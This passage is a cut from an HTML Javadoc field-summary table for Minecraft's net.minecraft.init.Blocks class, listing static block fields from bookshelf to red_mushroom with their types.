<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#bookshelf">bookshelf</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#brewing_stand">brewing_stand</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#brick_block">brick_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#brick_stairs">brick_stairs</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockBush.html" title="class in net.minecraft.block">BlockBush</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#brown_mushroom">brown_mushroom</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#brown_mushroom_block">brown_mushroom_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cactus">cactus</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cake">cake</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#carpet">carpet</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#carrots">carrots</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockCauldron.html" title="class in net.minecraft.block">BlockCauldron</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cauldron">cauldron</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockChest.html" title="class in net.minecraft.block">BlockChest</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#chest">chest</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#clay">clay</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#coal_block">coal_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#coal_ore">coal_ore</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cobblestone">cobblestone</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cobblestone_wall">cobblestone_wall</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#cocoa">cocoa</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#command_block">command_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#crafting_table">crafting_table</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#dark_oak_stairs">dark_oak_stairs</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockDaylightDetector.html" title="class in net.minecraft.block">BlockDaylightDetector</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#daylight_detector">daylight_detector</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockDeadBush.html" title="class in net.minecraft.block">BlockDeadBush</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#deadbush">deadbush</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#detector_rail">detector_rail</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#diamond_block">diamond_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#diamond_ore">diamond_ore</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#dirt">dirt</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#dispenser">dispenser</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockDoublePlant.html" title="class in net.minecraft.block">BlockDoublePlant</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#double_plant">double_plant</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockSlab.html" title="class in net.minecraft.block">BlockSlab</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#double_stone_slab">double_stone_slab</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockSlab.html" title="class in net.minecraft.block">BlockSlab</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#double_wooden_slab">double_wooden_slab</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#dragon_egg">dragon_egg</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#dropper">dropper</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#emerald_block">emerald_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#emerald_ore">emerald_ore</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#enchanting_table">enchanting_table</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#end_portal">end_portal</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#end_portal_frame">end_portal_frame</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#end_stone">end_stone</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#ender_chest">ender_chest</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#farmland">farmland</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#fence">fence</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#fence_gate">fence_gate</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockFire.html" title="class in net.minecraft.block">BlockFire</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#fire">fire</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#flower_pot">flower_pot</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockLiquid.html" title="class in net.minecraft.block">BlockLiquid</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#flowing_lava">flowing_lava</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockLiquid.html" title="class in net.minecraft.block">BlockLiquid</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#flowing_water">flowing_water</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#furnace">furnace</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#glass">glass</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#glass_pane">glass_pane</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#glowstone">glowstone</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#gold_block">gold_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#gold_ore">gold_ore</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#golden_rail">golden_rail</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockGrass.html" title="class in net.minecraft.block">BlockGrass</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#grass">grass</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#gravel">gravel</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#hardened_clay">hardened_clay</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#hay_block">hay_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#heavy_weighted_pressure_plate">heavy_weighted_pressure_plate</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockHopper.html" title="class in net.minecraft.block">BlockHopper</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#hopper">hopper</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#ice">ice</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#iron_bars">iron_bars</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#iron_block">iron_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#iron_door">iron_door</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#iron_ore">iron_ore</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#jukebox">jukebox</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#jungle_stairs">jungle_stairs</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#ladder">ladder</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lapis_block">lapis_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lapis_ore">lapis_ore</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lava">lava</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockLeaves.html" title="class in net.minecraft.block">BlockLeaves</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#leaves">leaves</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockLeaves.html" title="class in net.minecraft.block">BlockLeaves</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#leaves2">leaves2</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lever">lever</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#light_weighted_pressure_plate">light_weighted_pressure_plate</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lit_furnace">lit_furnace</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lit_pumpkin">lit_pumpkin</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lit_redstone_lamp">lit_redstone_lamp</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#lit_redstone_ore">lit_redstone_ore</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#log">log</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#log2">log2</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#melon_block">melon_block</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#melon_stem">melon_stem</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#mob_spawner">mob_spawner</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#monster_egg">monster_egg</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#mossy_cobblestone">mossy_cobblestone</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockMycelium.html" title="class in net.minecraft.block">BlockMycelium</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#mycelium">mycelium</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#nether_brick">nether_brick</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#nether_brick_fence">nether_brick_fence</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#nether_brick_stairs">nether_brick_stairs</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#nether_wart">nether_wart</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#netherrack">netherrack</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#noteblock">noteblock</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#oak_stairs">oak_stairs</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#obsidian">obsidian</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#packed_ice">packed_ice</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockPistonBase.html" title="class in net.minecraft.block">BlockPistonBase</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#piston">piston</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockPistonMoving.html" title="class in net.minecraft.block">BlockPistonMoving</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#piston_extension">piston_extension</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockPistonExtension.html" title="class in net.minecraft.block">BlockPistonExtension</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#piston_head">piston_head</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#planks">planks</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockPortal.html" title="class in net.minecraft.block">BlockPortal</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#portal">portal</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#potatoes">potatoes</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockRedstoneComparator.html" title="class in net.minecraft.block">BlockRedstoneComparator</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#powered_comparator">powered_comparator</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockRedstoneRepeater.html" title="class in net.minecraft.block">BlockRedstoneRepeater</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#powered_repeater">powered_repeater</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#pumpkin">pumpkin</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#pumpkin_stem">pumpkin_stem</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#quartz_block">quartz_block</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#quartz_ore">quartz_ore</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#quartz_stairs">quartz_stairs</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#rail">rail</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockFlower.html" title="class in net.minecraft.block">BlockFlower</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#red_flower">red_flower</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockBush.html" title="class in net.minecraft.block">BlockBush</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#red_mushroom">red_mushroom</a></strong></code> </td>
</tr>
<tr class="altColor">
